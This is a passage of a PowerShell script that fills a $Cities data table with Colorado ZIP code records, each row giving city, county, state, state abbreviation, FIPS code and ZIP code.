$Cities.Rows.Add("Aurora","Adams","Colorado","CO","8","80019") + $null = $Cities.Rows.Add("Broomfield","Boulder","Colorado","CO","8","80020") + $null = $Cities.Rows.Add("Westminster","Jefferson","Colorado","CO","8","80021") + $null = $Cities.Rows.Add("Commerce city","Adams","Colorado","CO","8","80022") + $null = $Cities.Rows.Add("Dupont","Adams","Colorado","CO","8","80024") + $null = $Cities.Rows.Add("Eldorado springs","Boulder","Colorado","CO","8","80025") + $null = $Cities.Rows.Add("Lafayette","Boulder","Colorado","CO","8","80026") + $null = $Cities.Rows.Add("Louisville","Boulder","Colorado","CO","8","80027") + $null = $Cities.Rows.Add("Westminster","Adams","Colorado","CO","8","80030") + $null = $Cities.Rows.Add("Westminster","Adams","Colorado","CO","8","80031") + $null = $Cities.Rows.Add("Wheat ridge","Jefferson","Colorado","CO","8","80033") + $null = $Cities.Rows.Add("Zcta 800hh","Arapahoe","Colorado","CO","8","800HH") + $null = $Cities.Rows.Add("Zcta 800xx","Adams","Colorado","CO","8","800XX") + $null = $Cities.Rows.Add("Agate","Elbert","Colorado","CO","8","80101") + $null = $Cities.Rows.Add("Bennett","Adams","Colorado","CO","8","80102") + $null = $Cities.Rows.Add("Byers","Arapahoe","Colorado","CO","8","80103") + $null = $Cities.Rows.Add("Castle rock","Douglas","Colorado","CO","8","80104") + $null = $Cities.Rows.Add("Deer trail","Arapahoe","Colorado","CO","8","80105") + $null = $Cities.Rows.Add("Elbert","El Paso","Colorado","CO","8","80106") + $null = $Cities.Rows.Add("Elizabeth","Elbert","Colorado","CO","8","80107") + $null = $Cities.Rows.Add("Cherry hills vil","Arapahoe","Colorado","CO","8","80110") + $null = $Cities.Rows.Add("Cherry hills vil","Arapahoe","Colorado","CO","8","80111") + $null = $Cities.Rows.Add("Englewood","Arapahoe","Colorado","CO","8","80112") + $null = $Cities.Rows.Add("Franktown","Douglas","Colorado","CO","8","80116") + $null = $Cities.Rows.Add("Kiowa","Elbert","Colorado","CO","8","80117") + $null = $Cities.Rows.Add("Larkspur","Douglas","Colorado","CO","8","80118") + $null = $Cities.Rows.Add("Littleton","Arapahoe","Colorado","CO","8","80120") + $null = $Cities.Rows.Add("Greenwood villag","Arapahoe","Colorado","CO","8","80121") + $null = $Cities.Rows.Add("Littleton","Arapahoe","Colorado","CO","8","80122") + $null = $Cities.Rows.Add("Bow mar","Jefferson","Colorado","CO","8","80123") + $null = $Cities.Rows.Add("Littleton","Douglas","Colorado","CO","8","80124") + $null = $Cities.Rows.Add("Littleton","Douglas","Colorado","CO","8","80125") + $null = $Cities.Rows.Add("Highlands ranch","Douglas","Colorado","CO","8","80126") + $null = $Cities.Rows.Add("Littleton","Jefferson","Colorado","CO","8","80127") + $null = $Cities.Rows.Add("Zcta 80128","Jefferson","Colorado","CO","8","80128") + $null = $Cities.Rows.Add("Monument","El Paso","Colorado","CO","8","80132") + $null = $Cities.Rows.Add("Palmer lake","El Paso","Colorado","CO","8","80133") + $null = $Cities.Rows.Add("Parker","Douglas","Colorado","CO","8","80134") + $null = $Cities.Rows.Add("Deckers","Douglas","Colorado","CO","8","80135") + $null = $Cities.Rows.Add("Strasburg","Adams","Colorado","CO","8","80136") + $null = $Cities.Rows.Add("Watkins","Adams","Colorado","CO","8","80137") + $null = $Cities.Rows.Add("Zcta 80138","Douglas","Colorado","CO","8","80138") + $null = $Cities.Rows.Add("Zcta 801xx","Arapahoe","Colorado","CO","8","801XX") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80202") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80203") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80204") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80205") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80206") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80207") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80209") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80210") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80211") + $null = $Cities.Rows.Add("Mountain view","Denver","Colorado","CO","8","80212") + $null = $Cities.Rows.Add("Edgewater","Jefferson","Colorado","CO","8","80214") + $null = $Cities.Rows.Add("Lakewood","Jefferson","Colorado","CO","8","80215") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80216") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80218") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80219") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80220") + $null = $Cities.Rows.Add("Federal heights","Adams","Colorado","CO","8","80221") + $null = $Cities.Rows.Add("Glendale","Denver","Colorado","CO","8","80222") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80223") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80224") + $null = $Cities.Rows.Add("Lakewood","Jefferson","Colorado","CO","8","80226") + $null = $Cities.Rows.Add("Denver","Jefferson","Colorado","CO","8","80227") + $null = $Cities.Rows.Add("Lakewood","Jefferson","Colorado","CO","8","80228") + $null = $Cities.Rows.Add("Thornton","Adams","Colorado","CO","8","80229") + $null = $Cities.Rows.Add("Lowry afb","Denver","Colorado","CO","8","80230") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80231") + $null = $Cities.Rows.Add("Lakewood","Jefferson","Colorado","CO","8","80232") + $null = $Cities.Rows.Add("Northglenn","Adams","Colorado","CO","8","80233") + $null = $Cities.Rows.Add("Northglenn","Adams","Colorado","CO","8","80234") + $null = $Cities.Rows.Add("Denver","Jefferson","Colorado","CO","8","80235") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80236") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80237") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80239") + $null = $Cities.Rows.Add("Northglenn","Adams","Colorado","CO","8","80241") + $null = $Cities.Rows.Add("Zcta 80246","Denver","Colorado","CO","8","80246") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80249") + $null = $Cities.Rows.Add("Zcta 80260","Adams","Colorado","CO","8","80260") + $null = $Cities.Rows.Add("Lincoln center b","Denver","Colorado","CO","8","80264") + $null = $Cities.Rows.Add("Two united bank","Denver","Colorado","CO","8","80290") + $null = $Cities.Rows.Add("First interstate","Denver","Colorado","CO","8","80293") + $null = $Cities.Rows.Add("Denver","Denver","Colorado","CO","8","80294") + $null = $Cities.Rows.Add("Boulder","Boulder","Colorado","CO","8","80301") + $null = $Cities.Rows.Add("Boulder","Boulder","Colorado","CO","8","80302") + $null = $Cities.Rows.Add("Boulder","Boulder","Colorado","CO","8","80303") + $null = $Cities.Rows.Add("Boulder","Boulder","Colorado","CO","8","80304") + $null = $Cities.Rows.Add("Golden","Jefferson","Colorado","CO","8","80401") + $null = $Cities.Rows.Add("Golden","Jefferson","Colorado","CO","8","80403") + $null = $Cities.Rows.Add("Alma","Park","Colorado","CO","8","80420") + $null = $Cities.Rows.Add("Bailey","Park","Colorado","CO","8","80421") + $null = $Cities.Rows.Add("Black hawk","Gilpin","Colorado","CO","8","80422") + $null = $Cities.Rows.Add("Bond","Eagle","Colorado","CO","8","80423") + $null = $Cities.Rows.Add("Breckenridge","Summit","Colorado","CO","8","80424") + $null = $Cities.Rows.Add("Buffalo creek","Jefferson","Colorado","CO","8","80425") + $null = $Cities.Rows.Add("Burns","Eagle","Colorado","CO","8","80426") + $null = $Cities.Rows.Add("Central city","Gilpin","Colorado","CO","8","80427") + $null = $Cities.Rows.Add("Clark","Routt","Colorado","CO","8","80428") + $null = $Cities.Rows.Add("Coalmont","Jackson","Colorado","CO","8","80430") + $null = $Cities.Rows.Add("Como","Park","Colorado","CO","8","80432") + $null = $Cities.Rows.Add("Conifer","Jefferson","Colorado","CO","8","80433") + $null = $Cities.Rows.Add("Cowdrey","Jackson","Colorado","CO","8","80434") + $null = $Cities.Rows.Add("Keystone","Summit","Colorado","CO","8","80435") + $null = $Cities.Rows.Add("Dumont","Clear Creek","Colorado","CO","8","80436") + $null = $Cities.Rows.Add("Empire","Clear Creek","Colorado","CO","8","80438") + $null = $Cities.Rows.Add("Evergreen","Jefferson","Colorado","CO","8","80439") + $null = $Cities.Rows.Add("Fairplay","Park","Colorado","CO","8","80440") + $null = $Cities.Rows.Add("Fraser","Grand","Colorado","CO","8","80442") + $null = $Cities.Rows.Add("Copper mountain","Summit","Colorado","CO","8","80443") + $null = $Cities.Rows.Add("Georgetown","Clear Creek","Colorado","CO","8","80444") + $null = $Cities.Rows.Add("Granby","Grand","Colorado","CO","8","80446") + $null = $Cities.Rows.Add("Grand lake","Grand","Colorado","CO","8","80447") + $null = $Cities.Rows.Add("Grant","Park","Colorado","CO","8","80448") + $null = $Cities.Rows.Add("Hartsel","Park","Colorado","CO","8","80449") + $null = $Cities.Rows.Add("Hot sulphur spri","Grand","Colorado","CO","8","80451") + $null = $Cities.Rows.Add("Idaho springs","Clear Creek","Colorado","CO","8","80452") + $null = $Cities.Rows.Add("Indian hills","Jefferson","Colorado","CO","8","80454") + $null = $Cities.Rows.Add("Jamestown","Boulder","Colorado","CO","8","80455") + $null = $Cities.Rows.Add("Jefferson","Park","Colorado","CO","8","80456") + $null = $Cities.Rows.Add("Kittredge","Jefferson","Colorado","CO","8","80457") + $null = $Cities.Rows.Add("Kremmling","Grand","Colorado","CO","8","80459") + $null = $Cities.Rows.Add("Leadville","Lake","Colorado","CO","8","80461") + $null = $Cities.Rows.Add("Mc coy","Eagle","Colorado","CO","8","80463") + $null = $Cities.Rows.Add("Morrison","Jefferson","Colorado","CO","8","80465") + $null = $Cities.Rows.Add("Nederland","Boulder","Colorado","CO","8","80466") + $null = $Cities.Rows.Add("Oak creek","Routt","Colorado","CO","8","80467") + $null = $Cities.Rows.Add("Parshall","Grand","Colorado","CO","8","80468") + $null = $Cities.Rows.Add("Phippsburg","Routt","Colorado","CO","8","80469") + $null = $Cities.Rows.Add("Pine","Jefferson","Colorado","CO","8","80470") + $null = $Cities.Rows.Add("Rand","Jackson","Colorado","CO","8","80473") + $null = $Cities.Rows.Add("Rollinsville","Gilpin","Colorado","CO","8","80474") + $null = $Cities.Rows.Add("Silver plume","Clear Creek","Colorado","CO","8","80476") + $null = $Cities.Rows.Add("Tabernash","Grand","Colorado","CO","8","80478") + $null = $Cities.Rows.Add("Toponas","Routt","Colorado","CO","8","80479") + $null = $Cities.Rows.Add("Walden","Jackson","Colorado","CO","8","80480") + $null = $Cities.Rows.Add("Ward","Boulder","Colorado","CO","8","80481") + $null = $Cities.Rows.Add("Winter park","Grand","Colorado","CO","8","80482") + $null = $Cities.Rows.Add("Yampa","Routt","Colorado","CO","8","80483") + $null = $Cities.Rows.Add("Steamboat spring","Routt","Colorado","CO","8","80487") + $null = $Cities.Rows.Add("Silverthorne","Summit","Colorado","CO","8","80498") + $null = $Cities.Rows.Add("Zcta 804hh","Grand","Colorado","CO","8","804HH") + $null = $Cities.Rows.Add("Zcta 804xx","Grand","Colorado","CO","8","804XX") + $null = $Cities.Rows.Add("Longmont","Boulder","Colorado","CO","8","80501") + $null = $Cities.Rows.Add("Longmont","Boulder","Colorado","CO","8","80503") + $null = $Cities.Rows.Add("Longmont","Weld","Colorado","CO","8","80504") + $null = $Cities.Rows.Add("Allenspark","Boulder","Colorado","CO","8","80510") + $null = $Cities.Rows.Add("Bellvue","Larimer","Colorado","CO","8","80512") + $null = $Cities.Rows.Add("Berthoud","Larimer","Colorado","CO","8","80513") + $null = $Cities.Rows.Add("Dacono","Weld","Colorado","CO","8","80514") + $null = $Cities.Rows.Add("Drake","Larimer","Colorado","CO","8","80515") + $null = $Cities.Rows.Add("Erie","Boulder","Colorado","CO","8","80516") + $null = $Cities.Rows.Add("Estes park","Larimer","Colorado","CO","8","80517") + $null = $Cities.Rows.Add("Firestone","Weld","Colorado","CO","8","80520") + $null = $Cities.Rows.Add("Fort collins","Larimer","Colorado","CO","8","80521") + $null = $Cities.Rows.Add("Fort collins","Larimer","Colorado","CO","8","80524") + $null = $Cities.Rows.Add("Fort collins","Larimer","Colorado","CO","8","80525") + $null = $Cities.Rows.Add("Fort collins","Larimer","Colorado","CO","8","80526") + $null = $Cities.Rows.Add("Zcta 80528","Larimer","Colorado","CO","8","80528") + $null = $Cities.Rows.Add("Frederick","Weld","Colorado","CO","8","80530") + $null = $Cities.Rows.Add("Glen haven","Larimer","Colorado","CO","8","80532") + $null = $Cities.Rows.Add("Johnstown","Weld","Colorado","CO","8","80534") + $null = $Cities.Rows.Add("Laporte","Larimer","Colorado","CO","8","80535") + $null = $Cities.Rows.Add("Virginia dale","Larimer","Colorado","CO","8","80536") + $null = $Cities.Rows.Add("Loveland","Larimer","Colorado","CO","8","80537") + $null = $Cities.Rows.Add("Loveland","Larimer","Colorado","CO","8","80538") + $null = $Cities.Rows.Add("Lyons","Boulder","Colorado","CO","8","80540") + $null = $Cities.Rows.Add("Mead","Weld","Colorado","CO","8","80542") + $null = $Cities.Rows.Add("Milliken","Weld","Colorado","CO","8","80543") + $null = $Cities.Rows.Add("Red feather lake","Larimer","Colorado","CO","8","80545") + $null = $Cities.Rows.Add("Timnath","Larimer","Colorado","CO","8","80547") + $null = $Cities.Rows.Add("Wellington","Larimer","Colorado","CO","8","80549") + $null = $Cities.Rows.Add("Windsor","Weld","Colorado","CO","8","80550") + $null = $Cities.Rows.Add("Lochbui","Adams","Colorado","CO","8","80601") + $null = $Cities.Rows.Add("Ault","Weld","Colorado","CO","8","80610") + $null = $Cities.Rows.Add("Briggsdale","Weld","Colorado","CO","8","80611") + $null = $Cities.Rows.Add("Carr","Weld","Colorado","CO","8","80612") + $null = $Cities.Rows.Add("Eaton","Weld","Colorado","CO","8","80615") + $null = $Cities.Rows.Add("Evans","Weld","Colorado","CO","8","80620") + $null = $Cities.Rows.Add("Wattenburg","Weld","Colorado","CO","8","80621") + $null = $Cities.Rows.Add("Gilcrest","Weld","Colorado","CO","8","80623") + $null = $Cities.Rows.Add("Gill","Weld","Colorado","CO","8","80624") + $null = $Cities.Rows.Add("Garden city","Weld","Colorado","CO","8","80631") + $null = $Cities.Rows.Add("Greeley","Weld","Colorado","CO","8","80634") + $null = $Cities.Rows.Add("Henderson","Adams","Colorado","CO","8","80640") + $null = $Cities.Rows.Add("Hudson","Weld","Colorado","CO","8","80642") + $null = $Cities.Rows.Add("Keenesburg","Weld","Colorado","CO","8","80643") + $null = $Cities.Rows.Add("Kersey","Weld","Colorado","CO","8","80644") + $null = $Cities.Rows.Add("La salle","Weld","Colorado","CO","8","80645") + $null = $Cities.Rows.Add("Nunn","Weld","Colorado","CO","8","80648") + $null = $Cities.Rows.Add("Orchard","Morgan","Colorado","CO","8","80649") + $null = $Cities.Rows.Add("Pierce","Weld","Colorado","CO","8","80650") + $null = $Cities.Rows.Add("Platteville","Weld","Colorado","CO","8","80651") + $null = $Cities.Rows.Add("Roggen","Weld","Colorado","CO","8","80652") + $null = $Cities.Rows.Add("Weldona","Morgan","Colorado","CO","8","80653") + $null = $Cities.Rows.Add("Hoyt","Morgan","Colorado","CO","8","80654") + $null = $Cities.Rows.Add("Zcta 806hh","Adams","Colorado","CO","8","806HH") + $null = $Cities.Rows.Add("Fort morgan","Morgan","Colorado","CO","8","80701") + $null = $Cities.Rows.Add("Log lane village","Morgan","Colorado","CO","8","80705") + $null = $Cities.Rows.Add("Akron","Washington","Colorado","CO","8","80720") + $null = $Cities.Rows.Add("Amherst","Phillips","Colorado","CO","8","80721") + $null = $Cities.Rows.Add("Atwood","Logan","Colorado","CO","8","80722") + $null = $Cities.Rows.Add("Brush","Morgan","Colorado","CO","8","80723") + $null = $Cities.Rows.Add("Crook","Logan","Colorado","CO","8","80726") + $null = $Cities.Rows.Add("Eckley","Yuma","Colorado","CO","8","80727") + $null = $Cities.Rows.Add("Fleming","Logan","Colorado","CO","8","80728") + $null = $Cities.Rows.Add("Grover","Weld","Colorado","CO","8","80729") + $null = $Cities.Rows.Add("Haxtun","Phillips","Colorado","CO","8","80731") + $null = $Cities.Rows.Add("Hillrose","Morgan","Colorado","CO","8","80733") + $null = $Cities.Rows.Add("Holyoke","Phillips","Colorado","CO","8","80734") + $null = $Cities.Rows.Add("Hale","Yuma","Colorado","CO","8","80735") + $null = $Cities.Rows.Add("Iliff","Logan","Colorado","CO","8","80736") + $null = $Cities.Rows.Add("Julesburg","Sedgwick","Colorado","CO","8","80737") + $null = $Cities.Rows.Add("Lindon","Washington","Colorado","CO","8","80740") + $null = $Cities.Rows.Add("Willard","Logan","Colorado","CO","8","80741") + $null = $Cities.Rows.Add("New raymer","Weld","Colorado","CO","8","80742") + $null = $Cities.Rows.Add("Otis","Washington","Colorado","CO","8","80743") + $null = $Cities.Rows.Add("Ovid","Sedgwick","Colorado","CO","8","80744") + $null = $Cities.Rows.Add("Padroni","Logan","Colorado","CO","8","80745") + $null = $Cities.Rows.Add("Peetz","Logan","Colorado","CO","8","80747") + $null = $Cities.Rows.Add("Sedgwick","Sedgwick","Colorado","CO","8","80749") + $null = $Cities.Rows.Add("Snyder","Morgan","Colorado","CO","8","80750") + $null = $Cities.Rows.Add("Sterling","Logan","Colorado","CO","8","80751") + $null = $Cities.Rows.Add("Stoneham","Weld","Colorado","CO","8","80754") + $null = $Cities.Rows.Add("Vernon","Yuma","Colorado","CO","8","80755") + $null = $Cities.Rows.Add("Last chance","Washington","Colorado","CO","8","80757") + $null = $Cities.Rows.Add("Laird","Yuma","Colorado","CO","8","80758") + $null = $Cities.Rows.Add("Yuma","Yuma","Colorado","CO","8","80759") + $null = $Cities.Rows.Add("Zcta 807hh","Logan","Colorado","CO","8","807HH") + $null = $Cities.Rows.Add("Anton","Washington","Colorado","CO","8","80801") + $null = $Cities.Rows.Add("Arapahoe","Cheyenne","Colorado","CO","8","80802") + $null = $Cities.Rows.Add("Arriba","Lincoln","Colorado","CO","8","80804") + $null = $Cities.Rows.Add("Bethune","Kit Carson","Colorado","CO","8","80805") + $null = $Cities.Rows.Add("Burlington","Kit Carson","Colorado","CO","8","80807") + $null = $Cities.Rows.Add("Calhan","El Paso","Colorado","CO","8","80808") + $null = $Cities.Rows.Add("North pole","El Paso","Colorado","CO","8","80809") + $null = $Cities.Rows.Add("Cheyenne wells","Cheyenne","Colorado","CO","8","80810") + $null = $Cities.Rows.Add("Cope","Washington","Colorado","CO","8","80812") + $null = $Cities.Rows.Add("Cripple creek","Teller","Colorado","CO","8","80813") + $null = $Cities.Rows.Add("Divide","Teller","Colorado","CO","8","80814") + $null = $Cities.Rows.Add("Flagler","Kit Carson","Colorado","CO","8","80815") + $null = $Cities.Rows.Add("Florissant","Teller","Colorado","CO","8","80816") + $null = $Cities.Rows.Add("Fountain","El Paso","Colorado","CO","8","80817") + $null = $Cities.Rows.Add("Genoa","Lincoln","Colorado","CO","8","80818") + $null = $Cities.Rows.Add("Green mountain f","El Paso","Colorado","CO","8","80819") + $null = $Cities.Rows.Add("Guffey","Park","Colorado","CO","8","80820") + $null = $Cities.Rows.Add("Hugo","Lincoln","Colorado","CO","8","80821") + $null = $Cities.Rows.Add("Joes","Yuma","Colorado","CO","8","80822") + $null = $Cities.Rows.Add("Karval","Lincoln","Colorado","CO","8","80823") + $null = $Cities.Rows.Add("Kirk","Yuma","Colorado","CO","8","80824") + $null = $Cities.Rows.Add("Kit carson","Cheyenne","Colorado","CO","8","80825") + $null = $Cities.Rows.Add("Lake george","Park","Colorado","CO","8","80827") + $null = $Cities.Rows.Add("Limon","Lincoln","Colorado","CO","8","80828") + $null = $Cities.Rows.Add("Manitou springs","El Paso","Colorado","CO","8","80829") + $null = $Cities.Rows.Add("Matheson","Elbert","Colorado","CO","8","80830") + $null = $Cities.Rows.Add("Peyton","El Paso","Colorado","CO","8","80831") + $null = $Cities.Rows.Add("Ramah","El Paso","Colorado","CO","8","80832") + $null = $Cities.Rows.Add("Rush","El Paso","Colorado","CO","8","80833") + $null = $Cities.Rows.Add("Seibert","Kit Carson","Colorado","CO","8","80834") + $null = $Cities.Rows.Add("Simla","Elbert","Colorado","CO","8","80835") + $null = $Cities.Rows.Add("Stratton","Kit Carson","Colorado","CO","8","80836") + $null = $Cities.Rows.Add("United states ai","El Paso","Colorado","CO","8","80840") + $null = $Cities.Rows.Add("Victor","Teller","Colorado","CO","8","80860") + $null = $Cities.Rows.Add("Vona","Kit Carson","Colorado","CO","8","80861") + $null = $Cities.Rows.Add("Wild horse","Cheyenne","Colorado","CO","8","80862") + $null = $Cities.Rows.Add("Woodland park","Teller","Colorado","CO","8","80863") + $null = $Cities.Rows.Add("Yoder","El Paso","Colorado","CO","8","80864") + $null = $Cities.Rows.Add("Woodland park","Teller","Colorado","CO","8","80866") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80903") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80904") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80905") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80906") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80907") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80908") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80909") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80910") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80911") + $null = $Cities.Rows.Add("Fort carson","El Paso","Colorado","CO","8","80913") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80915") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80916") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80917") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80918") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80919") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80920") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80921") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80922") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80925") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80926") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80928") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80929") + $null = $Cities.Rows.Add("Colorado springs","El Paso","Colorado","CO","8","80930") + $null = $Cities.Rows.Add("Pueblo","Pueblo","Colorado","CO","8","81001") + $null = $Cities.Rows.Add("Pueblo","Pueblo","Colorado","CO","8","81003") + $null = $Cities.Rows.Add("Pueblo","Pueblo","Colorado","CO","8","81004") + $null = $Cities.Rows.Add("Pueblo","Pueblo","Colorado","CO","8","81005") + $null = $Cities.Rows.Add("Pueblo","Pueblo","Colorado","CO","8","81006") + $null = $Cities.Rows.Add("Pueblo west","Pueblo","Colorado","CO","8","81007") + $null = $Cities.Rows.Add("Pueblo","Pueblo","Colorado","CO","8","81008") + $null = $Cities.Rows.Add("Aguilar","Las Animas","Colorado","CO","8","81020") + $null = $Cities.Rows.Add("Arlington","Kiowa","Colorado","CO","8","81021") + $null = $Cities.Rows.Add("North avondale","Pueblo","Colorado","CO","8","81022") + $null = $Cities.Rows.Add("Beulah","Pueblo","Colorado","CO","8","81023") + $null = $Cities.Rows.Add("Boncarbo","Las Animas","Colorado","CO","8","81024") + $null = $Cities.Rows.Add("Boone","Pueblo","Colorado","CO","8","81025") + $null = $Cities.Rows.Add("Branson","Las Animas","Colorado","CO","8","81027") + $null = $Cities.Rows.Add("Campo","Baca","Colorado","CO","8","81029") + $null = $Cities.Rows.Add("Cheraw","Otero","Colorado","CO","8","81030") + $null = $Cities.Rows.Add("Crowley","Crowley","Colorado","CO","8","81033") + $null = $Cities.Rows.Add("Chivington","Kiowa","Colorado","CO","8","81036") + $null = $Cities.Rows.Add("Fowler","Otero","Colorado","CO","8","81039") + $null = $Cities.Rows.Add("Farisita","Huerfano","Colorado","CO","8","81040") + $null = $Cities.Rows.Add("Granada","Prowers","Colorado","CO","8","81041") + $null = $Cities.Rows.Add("Hartman","Prowers","Colorado","CO","8","81043") + $null = $Cities.Rows.Add("Caddoa","Bent","Colorado","CO","8","81044") + $null = $Cities.Rows.Add("Haswell","Kiowa","Colorado","CO","8","81045") + $null = $Cities.Rows.Add("Holly","Prowers","Colorado","CO","8","81047") + $null = $Cities.Rows.Add("Villegreen","Las Animas","Colorado","CO","8","81049") + $null = $Cities.Rows.Add("Timpas","Otero","Colorado","CO","8","81050") + $null = $Cities.Rows.Add("Lamar","Prowers","Colorado","CO","8","81052") + $null = $Cities.Rows.Add("Deora","Bent","Colorado","CO","8","81054") + $null = $Cities.Rows.Add("Cuchara","Huerfano","Colorado","CO","8","81055") + $null = $Cities.Rows.Add("Mc clave","Bent","Colorado","CO","8","81057") + $null = $Cities.Rows.Add("Manzanola","Otero","Colorado","CO","8","81058") + $null = $Cities.Rows.Add("Delhi","Las Animas","Colorado","CO","8","81059") + $null = $Cities.Rows.Add("Olney springs","Crowley","Colorado","CO","8","81062") + $null = $Cities.Rows.Add("Ordway","Crowley","Colorado","CO","8","81063") + $null = $Cities.Rows.Add("Utleyville","Baca","Colorado","CO","8","81064") + $null = $Cities.Rows.Add("Red wing","Huerfano","Colorado","CO","8","81066") + $null = $Cities.Rows.Add("Rocky ford","Otero","Colorado","CO","8","81067") + $null = $Cities.Rows.Add("Rye","Pueblo","Colorado","CO","8","81069") + $null = $Cities.Rows.Add("Towner","Kiowa","Colorado","CO","8","81071") + $null = $Cities.Rows.Add("Springfield","Baca","Colorado","CO","8","81073") + $null = $Cities.Rows.Add("Sugar city","Crowley","Colorado","CO","8","81076") + $null = $Cities.Rows.Add("Swink","Otero","Colorado","CO","8","81077") + $null = $Cities.Rows.Add("Trinchera","Las Animas","Colorado","CO","8","81081") + $null = $Cities.Rows.Add("Jansen","Las Animas","Colorado","CO","8","81082") + $null = $Cities.Rows.Add("Lycan","Baca","Colorado","CO","8","81084") + $null = $Cities.Rows.Add("Vilas","Baca","Colorado","CO","8","81087") + $null = $Cities.Rows.Add("Farista","Huerfano","Colorado","CO","8","81089") + $null = $Cities.Rows.Add("Walsh","Baca","Colorado","CO","8","81090") + $null = $Cities.Rows.Add("Weston","Las Animas","Colorado","CO","8","81091") + $null = $Cities.Rows.Add("Wiley","Prowers","Colorado","CO","8","81092") + $null = $Cities.Rows.Add("Zcta 810hh","Bent","Colorado","CO","8","810HH") + $null = $Cities.Rows.Add("Zcta 810xx","Huerfano","Colorado","CO","8","810XX") + $null = $Cities.Rows.Add("Alamosa","Alamosa","Colorado","CO","8","81101") + $null = $Cities.Rows.Add("Antonito","Conejos","Colorado","CO","8","81120") + $null = $Cities.Rows.Add("Arboles","Archuleta","Colorado","CO","8","81121") + $null = $Cities.Rows.Add("Bayfield","La Plata","Colorado","CO","8","81122") + $null = $Cities.Rows.Add("Blanca","Costilla","Colorado","CO","8","81123") + $null = $Cities.Rows.Add("Capulin","Conejos","Colorado","CO","8","81124") + $null = $Cities.Rows.Add("Center","Saguache","Colorado","CO","8","81125") + $null = $Cities.Rows.Add("Chama","Costilla","Colorado","CO","8","81126") + $null = $Cities.Rows.Add("Chimney rock","Archuleta","Colorado","CO","8","81127") + $null = $Cities.Rows.Add("Chromo","Archuleta","Colorado","CO","8","81128") + $null = $Cities.Rows.Add("Creede","Mineral","Colorado","CO","8","81130") + $null = $Cities.Rows.Add("Crestone","Saguache","Colorado","CO","8","81131") + $null = $Cities.Rows.Add("La garita","Rio Grande","Colorado","CO","8","81132") + $null = $Cities.Rows.Add("Fort garland","Costilla","Colorado","CO","8","81133") + $null = $Cities.Rows.Add("Hooper","Alamosa","Colorado","CO","8","81136") + $null = $Cities.Rows.Add("Ignacio","La Plata","Colorado","CO","8","81137") + $null = $Cities.Rows.Add("La jara","Conejos","Colorado","CO","8","81140") + $null = $Cities.Rows.Add("Manassa","Conejos","Colorado","CO","8","81141") + $null = $Cities.Rows.Add("Moffat","Saguache","Colorado","CO","8","81143") + $null = $Cities.Rows.Add("Monte vista","Rio Grande","Colorado","CO","8","81144") + $null = $Cities.Rows.Add("Mosca","Alamosa","Colorado","CO","8","81146") + $null = $Cities.Rows.Add("Pagosa springs","Archuleta","Colorado","CO","8","81147") + $null = $Cities.Rows.Add("Romeo","Conejos","Colorado","CO","8","81148") + $null = $Cities.Rows.Add("Saguache","Saguache","Colorado","CO","8","81149") + $null = $Cities.Rows.Add("Sanford","Conejos","Colorado","CO","8","81151") + $null = $Cities.Rows.Add("Mesita","Costilla","Colorado","CO","8","81152") + $null = $Cities.Rows.Add("San pablo","Costilla","Colorado","CO","8","81153") + $null = $Cities.Rows.Add("South fork","Rio Grande","Colorado","CO","8","81154") + $null = $Cities.Rows.Add("Villa grove","Saguache","Colorado","CO","8","81155") + $null = $Cities.Rows.Add("Zcta 811xx","Costilla","Colorado","CO","8","811XX") + $null = $Cities.Rows.Add("Salida","Chaffee","Colorado","CO","8","81201") + $null = $Cities.Rows.Add("Almont","Gunnison","Colorado","CO","8","81210") + $null = $Cities.Rows.Add("Buena vista","Chaffee","Colorado","CO","8","81211") + $null = $Cities.Rows.Add("Canon city","Fremont","Colorado","CO","8","81212") + $null = $Cities.Rows.Add("Cimarron","Gunnison","Colorado","CO","8","81220") + $null = $Cities.Rows.Add("Coal creek","Fremont","Colorado","CO","8","81221") + $null = 